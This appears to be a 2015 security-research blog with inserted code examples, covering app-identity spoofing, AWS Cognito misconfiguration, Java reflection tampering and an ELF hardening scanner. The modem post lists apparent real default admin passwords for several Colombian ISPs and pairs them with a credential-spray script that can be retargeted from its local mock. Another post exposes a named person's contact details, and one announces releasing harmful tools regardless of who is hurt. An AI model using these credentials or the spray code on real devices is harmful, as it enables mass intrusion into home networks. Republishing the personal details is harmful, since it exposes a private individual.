Sunday, 27 December 2015

Spoof Packages And Signatures



App identification and verification schemes based on package names and signing certificates, like the one Parse adopted as its fix and the ones Google relies on, always looked to me like the best possible job. I kept asking myself: if it is really that good, can it still be hacked or bypassed?

Yes, everything in this world is hackable, no matter who wrote it, how much was paid for it, how qualified the developers are or how many thousands of dollars their education cost. Everything is hackable; one only has to examine the problem and break it.

I think this is really dangerous: you can create fake applications that behave like the original and reach tokens or keys that are supposed to be guarded by this kind of check. A package name, and a signature that the app reports about itself, are both under the attacker's control on a device the attacker owns, so a server that accepts them as proof of identity has authenticated nothing.

This protection is genuinely weak, and it is in use at large companies around the world; Google is only the tip of the iceberg.

Github: SpoofPackagesAndSignatures

Saturday, 12 December 2015

How To Hack a 310 Billion Dollar Company


Once again the big guys with bad security practices, this time Amazon's AWS S3 service.

The problem is the following. From versions 2.2.5 to 2.2.8 of the AWS SDK for Android, Amazon ships the class CognitoCachingCredentialsProvider. This class was created for one type of authentication, but that authentication is very insecure: it takes a Context, from which it obtains the package name, plus the identityPoolId and the region. With credentials obtained this way you can get, put, modify, delete and list buckets and files in S3. All you need is to extract the identityPoolId and build a fake app with the same package name as the original, and you are ready! The package name proves nothing, since the attacker picks it, so anyone holding the identityPoolId ends up with exactly the permissions the pool's unauthenticated role allows.
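Added example, not code from the post or from AWS, covering both the package-spoofing post above and this Cognito case: the trust decision is made entirely by the IAM policy attached to the identity pool's unauthenticated role. Anyone holding the identityPoolId (it ships inside the APK) can obtain that role's credentials through the GetId and GetCredentialsForIdentity operations, whatever package name their app presents. The script contrasts a constructed, over-permissive unauthenticated-role policy with one that is read-only for public content and scopes writes to the caller's own identity through the `${cognito-identity.amazonaws.com:sub}` policy variable, then lints a policy for the actions the post lists (list, put, modify, delete). The bucket name and both policies are constructed for the demo; only the action names and the policy variable are real AWS identifiers.

```python
import json

# Constructed policy for an identity pool's UNAUTHENTICATED role: anyone who
# knows the pool ID receives these permissions, no matter which package name
# their app reports.
WEAK_UNAUTH_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["s3:ListBucket", "s3:GetObject", "s3:PutObject", "s3:DeleteObject"],
        "Resource": ["arn:aws:s3:::example-app-bucket",
                     "arn:aws:s3:::example-app-bucket/*"],
    }],
}

# Constructed hardened version: public content is read-only, and writes are
# confined to a prefix derived from the caller's own Cognito identity ID.
HARDENED_UNAUTH_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject"],
            "Resource": ["arn:aws:s3:::example-app-bucket/public/*"],
        },
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:PutObject"],
            "Resource": ["arn:aws:s3:::example-app-bucket/users/"
                         "${cognito-identity.amazonaws.com:sub}/*"],
        },
    ],
}

# Actions that let an anonymous caller enumerate or change other people's data.
RISKY_ACTIONS = {"s3:ListBucket", "s3:PutObject", "s3:DeleteObject", "s3:*", "*"}
IDENTITY_SCOPE = "${cognito-identity.amazonaws.com:sub}"


def _as_list(value):
    return value if isinstance(value, list) else [value]


def audit_unauth_policy(policy):
    """Return one finding per Allow statement that grants a risky S3 action on
    a resource that is not scoped to the calling Cognito identity."""
    findings = []
    for index, statement in enumerate(policy.get("Statement", [])):
        if statement.get("Effect") != "Allow":
            continue
        actions = _as_list(statement.get("Action", []))
        resources = _as_list(statement.get("Resource", []))
        risky = sorted(a for a in actions if a in RISKY_ACTIONS or a.endswith("*"))
        unscoped = [r for r in resources if IDENTITY_SCOPE not in r]
        if risky and unscoped:
            findings.append({"statement": index, "actions": risky, "resources": unscoped})
    return findings


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_UNAUTH_POLICY), ("hardened", HARDENED_UNAUTH_POLICY)):
        print(name, json.dumps(audit_unauth_policy(policy), indent=2))
```

The hardened policy still hands credentials to anyone with the pool ID; what changes is that those credentials can only read what was meant to be public and write under a prefix nobody else can reach, which is the most an unauthenticated role should ever be allowed.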

Saturday, 26 September 2015

Hacking Throughout Latin America




Recently I have been doing some tests with the modems supplied by the ISPs in my country, specifically the model "Technicolor TC7300". This modem is provided by many companies in Colombia and throughout Latin America, and its problem is the following:

The ISPs in Colombia always refuse to give users the password, so users cannot change it themselves for better security. On top of that, these companies follow bad practices when choosing passwords: in some cases the same password for every modem across the country, in other cases the customer's identification number, and the remaining passwords are easy to break. So the device can be attacked by brute force to recover its password.

Just imagine a bot breaking passwords throughout Latin America, entering the settings of every modem it compromises without permission and forwarding all ports into the victims' internal networks; after that, imagine the rest.

Passwords used by companies in Colombia are:

- CLARO:
User: admin | Pass: Uq-4GIt3M | Pass: Swe-ty65 | Pass: RdET23-10 | Pass: TmcCm-651 | Pass: Ym9zV-05n | Pass: 1234 | Pass: 12345

- UNE:
User: admin | Pass: d3c0ntr0l | Pass: Cpe04Epm | Pass: CPE# + numbers
User: gestionune | Pass: g3sti0nr3m0t4
User: admin-UN3 | Pass: CM4CC3SS

- MOVISTAR:
User: admin | Pass: 6 numbers

- ETB:
User: administrator | Pass: customer phone number
User: customer | Pass: ClienteETB + year


This PoC (Proof of Concept) requires TOR to be configured in order to run.
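Added example, not the post's PoC (which the post says runs over TOR and which is not reproduced here): a credential-spray routine built from the per-ISP lists above, run against a local mock modem so it executes offline. The fixed passwords are the post's; the "numbers" patterns are expanded on the assumption of 4 digits after "CPE#" and 6 digits for MOVISTAR. The mock protects its admin page with HTTP Basic auth and has an optional lockout counter; the real TC7300 login form is not modelled. The lockout branch is the defensive half of the picture: a device that locks or throttles after a few failures turns a million-candidate list into nothing, and the spray stops at the first 403 because continuing only generates noise for the defender.

```python
import base64
import http.server
import threading
import urllib.error
import urllib.request


def candidates(isp, customer_phone="6011234567", year=2015):
    """Yield (user, password) pairs for one ISP. Fixed values follow the lists
    in the post; the "numbers" patterns are expanded lazily (assumed 4 digits
    after "CPE#", 6 digits for MOVISTAR) so the generator stays cheap."""
    if isp == "CLARO":
        for pw in ("Uq-4GIt3M", "Swe-ty65", "RdET23-10", "TmcCm-651",
                   "Ym9zV-05n", "1234", "12345"):
            yield ("admin", pw)
    elif isp == "UNE":
        yield ("admin", "d3c0ntr0l")
        yield ("admin", "Cpe04Epm")
        yield ("gestionune", "g3sti0nr3m0t4")
        yield ("admin-UN3", "CM4CC3SS")
        for n in range(10_000):
            yield ("admin", f"CPE#{n:04d}")
    elif isp == "MOVISTAR":
        for n in range(1_000_000):
            yield ("admin", f"{n:06d}")
    elif isp == "ETB":
        yield ("administrator", customer_phone)
        yield ("customer", f"ClienteETB{year}")


class MockModem(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a modem admin page behind HTTP Basic auth.
    State lives on the class because the server builds one handler per request."""
    valid = ("admin", "Cpe04Epm")   # the "secret" the spray is meant to find
    lockout_after = None            # None: no lockout, like a careless device
    failures = 0

    def do_GET(self):
        cls = type(self)
        if cls.lockout_after is not None and cls.failures >= cls.lockout_after:
            self.send_error(403, "locked out")
            return
        expected = "Basic " + base64.b64encode(":".join(cls.valid).encode()).decode()
        if self.headers.get("Authorization") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"admin page")
        else:
            cls.failures += 1
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="modem"')
            self.end_headers()

    def log_message(self, *args):   # keep the demo quiet
        pass


def spray(url, creds, max_attempts=100):
    """Try each credential pair against url. Returns the working pair, or None
    when the list or the attempt budget is exhausted, or when the target locks
    us out with 403 (further attempts would only make noise)."""
    for attempt, (user, pw) in enumerate(creds):
        if attempt >= max_attempts:
            return None
        token = base64.b64encode(f"{user}:{pw}".encode()).decode()
        req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
        try:
            with urllib.request.urlopen(req, timeout=2) as resp:
                if resp.status == 200:
                    return (user, pw)
        except urllib.error.HTTPError as err:
            if err.code == 403:
                return None
            if err.code != 401:
                raise
    return None


def run_demo(lockout_after=None, isp="UNE"):
    """Start the mock modem on a random local port, spray it, tear it down."""
    MockModem.lockout_after = lockout_after
    MockModem.failures = 0
    server = http.server.HTTPServer(("127.0.0.1", 0), MockModem)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return spray(f"http://127.0.0.1:{server.server_address[1]}/", candidates(isp))
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("no lockout:", run_demo())                 # ('admin', 'Cpe04Epm')
    print("lockout after 1:", run_demo(lockout_after=1))  # None
```

Without a lockout the second candidate on the UNE list opens the mock; with a lockout of one failure the same list gets nowhere, which is the cheapest fix an ISP could ship in firmware even before it stops reusing one password across a country.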


Friday, 4 September 2015

Threat Target: Security Researchers

Several of our researchers received these LinkedIn invitations from fake recruiter profiles; someone is mapping security researchers. I wondered who would want to target these people. A few days ago I received a fake email, sent from fake accounts, that pointed to phishing sites, and I asked myself whether the two were related. Sure: if someone is mapping the accounts of security researchers in general, the next step is to phish them. But it is strange enough to deserve a more thorough analysis, and when I did one, there was something deeper that smelled worse.


Jennifer White Fake Profile


Lea David Fake Invitation


List Fake Profiles


Fake Customer Message

Fake customer message used for phishing

Phishing Site

The WHOIS record for this phishing host:

Domain Name: TNCPKHARGONE.COM
Registry Domain ID: 1832762529_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2014-10-28T06:56:32Z
Creation Date: 2013-10-28T06:55:31Z
Registrar Registration Expiration Date: 2015-10-28T06:55:31Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited

Registry Registrant ID: 
Registrant Name: Mayank Shah
Registrant Street: hemkunt colony
Registrant City: Delhi
Registrant State/Province: Delhi
Registrant Postal Code: 10027
Registrant Country: India
Registrant Phone: 011462011
Registrant Email: mayankshah1986@hotmail.com

Registry Admin ID: 
Admin Name: Mayank Shah
Admin Street: hemkunt colony
Admin City: Delhi
Admin State/Province: Delhi
Admin Postal Code: 10027
Admin Country: India
Admin Phone: 011462011
Admin Email: mayankshah1986@hotmail.com

Registry Tech ID: 
Tech Name: Mayank Shah
Tech Street: hemkunt colony
Tech City: Delhi
Tech State/Province: Delhi
Tech Postal Code: 10027
Tech Country: India
Tech Phone: 011462011
Tech Email: mayankshah1986@hotmail.com

Now ask Google: https://goo.gl/MV0yHr

Google returns a list of online pharmacy and Hindu-themed sites = phishing.

And a reverse WHOIS, http://goo.gl/P4Rvkx, tells me this guy bought 17 other domains, maybe for phishing too.

Google Plus Profile

Facebook Profile

LinkedIn Profile

Phishing Site Scan Report

The next step is to get in touch with GoDaddy.com's abuse address, abuse@godaddy.com, and catch this stupid guy; good luck, idiot ;)

Virus Total Report: https://goo.gl/NnJN3E

Source Article: https://labsblog.f-secure.com

Monday, 24 August 2015

The theory of the Dark Ether

Recently we have been doing some tests with OpenSSL and metaprogramming, which made us think about the structures and the way programming languages and software work. We showed that the properties of Java classes can be modified at runtime, adding or deleting flags, and this left us with a question: if this can be done, what else could be done?

In particle physics we have seen that atoms are formed by electrons, protons and neutrons, which in turn are composed of quarks and leptons, the fundamental constituents of matter. We have seen how quantum mechanics explains the way the subatomic world operates, and that certain elements show exceptional properties under certain conditions; our real world is made up of nothing but particles and is not the solid world many believe it to be. Other physical theories argue that matter is energy vibrating at different frequencies: heat, sound, light. That made us think about whether this could apply to software and programming languages.

What is software? Simply a representation of objects in binary structures of 0s and 1s, grouped in many ways to run something. Software can be developed in multiple paradigms: linear, Object Oriented Programming (OOP), Agent Oriented Programming (AOP), Aspect Oriented Programming (AOP), Language Oriented Programming (LOP) and others.

Initially our research was to see what could be done with classes that are already compiled into a binary. During these tests we created a library called #Morpher, which gave us a friendlier way into metaprogramming without writing much code: with 5 lines it was possible to cover an entire class and change its properties at will.

This gave us a very crazy and strange idea: what if we could create a language and/or library that could do even stranger and more unusual things, that was light, fluid, amorphous, unregulated and untraceable, that could change fields, methods, constructors and classes, and that could be introduced into any language and/or platform? This gave us the idea of something called #DarkEther, which could be a single library or a programming language.

#DarkEther is something that could change the concepts we have held for years about software. It seems a really interesting topic, so we decided to dedicate some time to this research and to the possibilities of this theory. If it results in what we are thinking, we could probably do #BlackMagic with software at runtime, modifying and transmuting it into whatever we want; and if we mix it with AI, the possibilities would be endless. This could open new, unexplored areas in computer science, security and vulnerability analysis.

If you want to move an immovable object, stop something unstoppable or change something unchangeable, you need to change the properties of that element.

Dark Ether

Saturday, 22 August 2015

Why my publications appear as Jheto Xekri

The reason for the name "Jheto": many years ago there was a TV show called "The Highwayman" (1988), whose lead character is Mark "Jacko" Jackson. My old friends turned "Jacko" into "Jheto", and "Xekri" is the last name of an old avatar. That is the reason.

Mark "Jacko" Jackson


The Highwayman Opening

Greetings to all my old friends.

Changing the Language Rules

For years we have seen countless attacks on various platforms. In this case I explain one in Java, which can be reproduced in other languages and platforms. Every developer and security analyst takes for granted that if you program your code well it will keep you safe; the truth is that it will not. Everything can be transformed from something immutable into something mutable and then changed into whatever you want, and reflection is supported by many languages, among them Java, JavaScript, Objective-C, Perl, PHP, Python, R, Ruby, C# and others.

Just imagine what would happen if an application could change Java's defaults or access protected and hidden features. Imagine someone turning Booleans the other way round (false = true, true = false), giving numbers different values (0 = 1, 2 = 0, and so on), or worse, making a FINAL or PRIVATE member no longer be one. It is really simple; this is possible, and someone will do it at large scale, if they are not doing it already.

Below are some pictures that prove and describe our Morpher lib.

A class in another package

Runtime modification

Morpher library

Tests

The truth is simple: we can change whatever we want, wherever we want: modify constructors, methods and fields, hook classes and methods, overwrite classes and methods, and bypass further things in the source code at runtime.
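Added example, not the Morpher library itself (the post shows its code only as pictures) and not Java: the two moves this post and the Dark Ether post above describe, hooking every method of a class and overriding a member the code treats as fixed, done at runtime in Python, where the reflection API is just `vars()` and `setattr()`. The `LicenseGate` class is constructed for the demo. The check it defeats is the practitioner's caveat for both posts: a trust decision made inside a process the attacker controls (an app verifying its own signer, a client checking its own licence) is a convention, not a boundary, and has to be made on the other side of the trust boundary, on a server the attacker does not run.

```python
import functools
import inspect


class LicenseGate:
    """Constructed stand-in for an in-process check: the app only hands out a
    token when it believes it is signed by the expected signer."""
    TRUSTED_SIGNER = "deadbeef"          # treated as final by the app's code

    def __init__(self, signer):
        self._signer = signer            # "private" by naming convention only

    def is_trusted(self):
        return self._signer == self.TRUSTED_SIGNER

    def grant(self):
        return "token-for-real-client" if self.is_trusted() else None


def hook_class(cls, log):
    """Wrap every function defined on cls so each call's name and result are
    appended to log: the 'cover an entire class' move, in a handful of lines."""
    for name, member in list(vars(cls).items()):
        if not inspect.isfunction(member):
            continue

        def make_wrapper(original, label):
            @functools.wraps(original)
            def wrapper(self, *args, **kwargs):
                result = original(self, *args, **kwargs)
                log.append((label, result))
                return result
            return wrapper

        setattr(cls, name, make_wrapper(member, name))


def demo():
    """Mutates LicenseGate in place, so call it once per process."""
    log = []
    gate = LicenseGate("attacker-sig")
    before = gate.grant()                        # None: signer does not match

    hook_class(LicenseGate, log)                 # 1. observe every call
    LicenseGate.TRUSTED_SIGNER = "attacker-sig"  # 2. rewrite the "final" constant
    after_constant = gate.grant()                # token, via the real check

    LicenseGate.is_trusted = lambda self: True   # 3. replace the check outright
    LicenseGate.TRUSTED_SIGNER = "deadbeef"      # constant restored: still passes
    after_override = gate.grant()

    return before, after_constant, after_override, [name for name, _ in log]


if __name__ == "__main__":
    print(demo())
```

Step 2 needs no knowledge of the check's logic, only of the constant it compares against; step 3 needs neither. Nothing in the language stopped either one, which is the post's point, and the only answer is to not let the decision live in that process.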

Thursday, 13 August 2015

The Beginning of the Age of Digital Chaos

It is well known throughout the community of security researchers that very bad practices are used in industry. In the case of mobile devices, 90% of applications are vulnerable to multiple attacks and scams; large companies often develop very insecure software, from exposing user data to exposing credit card numbers. In desktop and server applications it is exactly the same. For some time we have been researching this, and we have seen that there are other platforms that could be attacked. A typical case is the ATM, which runs on Windows XP, which we all know is not the most secure operating system that has ever existed. Investigating further, we found that there is other, much more critical software that can expose things far more serious than user accounts, emails or credit cards: embedded systems, cloud and RTOS.

We have observed that CLOUD, SCADA (Supervisory Control and Data Acquisition), RTOS (Real Time Operating System) and embedded systems are deployed in critical systems, where a failure can trigger a global catastrophe, and there are multiple methods that could be used to attack them.

I think these systems are full of security flaws that nobody has seen, and that not even the developers know are there.

Speaking of bad practices carried out by industry and governments, take using Windows as the operating system for critical systems; a typical example is the US government, which keeps using Windows for its things. I think it is really bad to have Windows in a security agency or a military department.

On the other hand, we have some good practices from the military industry, which bases its systems on Linux platforms with DO-178B certification; nuclear reactors, missile batteries, warplanes and other critical military equipment depend on them. (DO-178B is an airborne software safety-assurance standard; it is not a security certification and says nothing about resistance to hostile input.) This left me with a question. I have seen news about attacks on military equipment, critical systems, nuclear reactors and more, so I ask myself: is this really safe, or are people afraid to do a deep analysis and find that it is just another operating system that can be attacked and breached?

I know that with this post many guys from the DoD and other governments are going to hate me, and perhaps it will bring me many problems and put me in the eye of the hurricane, but my task is to create secure things, improve software and expose what is not secure. I have already received some messages about this, from a few former military people and civilians.

For a long time we have seen how cars, cell phones, PCs and servers get hacked, and I am 100% sure this also applies to embedded systems, CLOUD, SCADA and RTOS.

What is an RTOS: an operating system that guarantees bounded response times. It is not necessarily a Linux, although some are Linux-based; some versions are safer than others, some are designed never to collapse and some are not, but many of them work with ELF (Executable and Linkable Format) binaries, and those binaries can be attacked either way.

Initially we have been working on a project called #VectorAttackScanner, which will be the first product of our company Vector Xtreme Technologies (VXT). It was first centred on detecting vulnerabilities in mobile devices and in operating systems such as Windows and Linux. We started this project because everyone knows there are guys who can defeat memory protections such as RELRO, PaX, ASLR, DEP, PIE, NX, SSP, stack canaries and others, so we had a small idea: what if we created something that tells us where we can attack and what should be improved so that we cannot? That is what our tool does.

For all these reasons we have decided to expand our target to the analysis of SCADA, embedded systems, RTOS and CLOUD, to provide a tool for analysing problems in critical systems. We do not want, one of these days, some lunatic to decide to blow up a pair of nuclear reactors or just trigger a third world war; we all know that in this world there are motherfuckers who get up every day looking forward to watching the world burn.

Only two things: we are just breaking software that is poorly developed, and everyone assuring that something is safe does not make it safe, even with all the certifications in the world.



By Jheto Xekri


Saturday, 9 May 2015

The new policy adopted for my new tools and PoCs

Because companies, magazines and conferences pay no attention to the security reports I send them completely free of charge, I am going to start developing tools without taking into account whom they hurt or how many people are affected, and I will publish the source code so it is available to everyone. Have fun with this.

If some companies start being attacked with my PoCs or tools, don't ask why; I tried to be the good guy, but I got tired...

I'm not doing anything illegal; if people want to commit crimes with my PoCs or tools, that's their problem, not mine. Good luck to your devs and security guys (y)


OldSchoolComeBack

This is the repo for my security bypass report "Old School Come Back".

It is only a Proof of Concept to demonstrate how it is possible to massively clone credit cards, fingerprints and other ID devices.

I am finishing a FingerPrintHook, SmartCardHook, PluggedHook and HumanInterfaceDeviceHook; soon I will publish the PoC (Proof of Concept).

Repository: OldSchoolComeBack

VectorAttackScanner

This is a tool to analyse Android, Linux and Windows targets and detect points of attack such as intents, receivers, services, processes and libraries.
The tool uses static analysis methods to do this; the attack vectors it finds can then be fuzzed to discover vulnerabilities.

Security researchers, bug hunters, exploit writers and malware developers all look for problems such as insecure compilation flags and exposed methods/functions; with this tool that is easier, because it searches for them automatically.

It is well known in the IT security world that countermeasures and memory protections have been created to make exploits harder to write and to stop programs from executing arbitrary code: RELRO, PaX, ASLR, PIE, NX, SSP, stack canaries and others. This tool searches for those flags to do its job.

For now the tool only checks the ELF binary format, looking for the RELRO, PaX, PIE, ASLR, NX, RPATH, RUNPATH, stack canary and FORTIFY_SOURCE protections. (ASLR itself is kernel policy rather than a property of the file; what a binary can show is whether it was built as PIE, so that the executable image benefits from it.)
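Added example, not VectorAttackScanner's code (the post does not show it): a checksec-style scanner for the flags listed above on a little-endian ELF64 image, together with a builder for a synthetic, non-loadable ELF so the scanner can be exercised offline. PIE is read from e_type, NX from the PT_GNU_STACK flags, RELRO from PT_GNU_RELRO plus DF_BIND_NOW / DF_1_NOW in the dynamic section, RPATH and RUNPATH from the DT_RPATH / DT_RUNPATH tags, and canary / FORTIFY from the names glibc's wrappers import, which here is a byte scan rather than a proper symbol-table walk. Two caveats a practitioner wants: e_type == ET_DYN also holds for shared libraries, so "pie" there means position independent rather than main-executable PIE, and PaX flags (which live in a separate PT_PAX_FLAGS header) are not covered. All constants are the standard ELF values; the image is constructed.

```python
import re
import struct

# Constants from the System V ABI and the Linux ELF headers.
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_RPATH, DT_RUNPATH, DT_FLAGS, DT_FLAGS_1 = 0, 15, 29, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, little-endian
PHDR = struct.Struct("<IIQQQQQQ")           # Elf64_Phdr
DYN = struct.Struct("<qQ")                  # Elf64_Dyn


def scan_elf(data):
    """Return the hardening flags of a little-endian ELF64 image held in bytes."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    fields = EHDR.unpack_from(data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = fields[1], fields[5], fields[9], fields[10]
    phdrs = [PHDR.unpack_from(data, e_phoff + i * e_phentsize) for i in range(e_phnum)]

    stack = [p for p in phdrs if p[0] == PT_GNU_STACK]
    nx = bool(stack) and not (stack[0][1] & PF_X)   # no PT_GNU_STACK: executable stack
    has_relro = any(p[0] == PT_GNU_RELRO for p in phdrs)

    tags = {}                                        # first value seen per dynamic tag
    for p in phdrs:
        if p[0] != PT_DYNAMIC:
            continue
        offset = p[2]                                # p_offset
        while offset + DYN.size <= len(data):
            tag, value = DYN.unpack_from(data, offset)
            if tag == DT_NULL:
                break
            tags.setdefault(tag, value)
            offset += DYN.size

    bind_now = bool(tags.get(DT_FLAGS, 0) & DF_BIND_NOW) or bool(tags.get(DT_FLAGS_1, 0) & DF_1_NOW)
    return {
        "pie": e_type == ET_DYN,
        "nx": nx,
        "relro": "full" if has_relro and bind_now else "partial" if has_relro else "none",
        "rpath": DT_RPATH in tags,
        "runpath": DT_RUNPATH in tags,
        # Heuristics: the names glibc's canary and FORTIFY wrappers import.
        "canary": b"__stack_chk_fail" in data,
        "fortify": re.search(rb"__[a-z_]+_chk\x00", data) is not None,
    }


def build_elf(pie=True, nx=True, relro="full", rpath=False, runpath=False,
              canary=True, fortify=True):
    """Construct a minimal synthetic ELF64 image (header, program headers,
    dynamic section, fake symbol-name blob) carrying the requested flags.
    It is not loadable; it exists only so scan_elf can be tested offline."""
    phnum = 2 + (relro != "none")
    dyn_off = EHDR.size + phnum * PHDR.size
    dyn = [DYN.pack(DT_FLAGS, DF_BIND_NOW if relro == "full" else 0)]
    if rpath:
        dyn.append(DYN.pack(DT_RPATH, 0))        # value is a string-table offset
    if runpath:
        dyn.append(DYN.pack(DT_RUNPATH, 0))
    dyn.append(DYN.pack(DT_NULL, 0))
    dyn = b"".join(dyn)

    phdrs = [PHDR.pack(PT_DYNAMIC, PF_R | PF_W, dyn_off, dyn_off, dyn_off, len(dyn), len(dyn), 8),
             PHDR.pack(PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X), 0, 0, 0, 0, 0, 16)]
    if relro != "none":
        phdrs.append(PHDR.pack(PT_GNU_RELRO, PF_R, dyn_off, dyn_off, dyn_off, len(dyn), len(dyn), 1))

    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)   # ELF64, little-endian, version 1
    header = EHDR.pack(ident, ET_DYN if pie else ET_EXEC, 0x3E, 1, 0, EHDR.size, 0, 0,
                       EHDR.size, PHDR.size, phnum, 64, 0, 0)
    names = (b"__stack_chk_fail\x00" if canary else b"") + (b"__memcpy_chk\x00" if fortify else b"")
    return header + b"".join(phdrs) + dyn + names


if __name__ == "__main__":
    weak = build_elf(pie=False, nx=False, relro="none", rpath=True, canary=False, fortify=False)
    for label, image in (("hardened", build_elf()), ("weak", weak)):
        print(label, scan_elf(image))
```

On a real file, replace `build_elf()` with `open(path, "rb").read()`; the canary and FORTIFY heuristics then behave like the string-based checks in checksec, which means a binary that merely contains those names in its .rodata is reported as protected.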


How To Hack an 85 Million Dollar Company

The Facebook security team replied to me that it is not a security flaw; I think more guys on the network will love this...

For the Facebook security team it is an acceptable security risk that any idiot can hack any database built with the Parse.com SDK.

You have to be an idiot to call it an "acceptable security risk" that any attacker can list, update and delete any data on their systems.

"The behavior you're describing is not a security/privacy risk"??? WTF??? What does Facebook think a risk is???

Well, the Center for Advanced Security Research Darmstadt (CASED) confirms the security flaw I discovered; check the article published on the SecurityScorecard blog: The Calm Before the Mobile API Data Breach Storm



Disassembly Part 1/2:

Proof of Concept Part 2/2: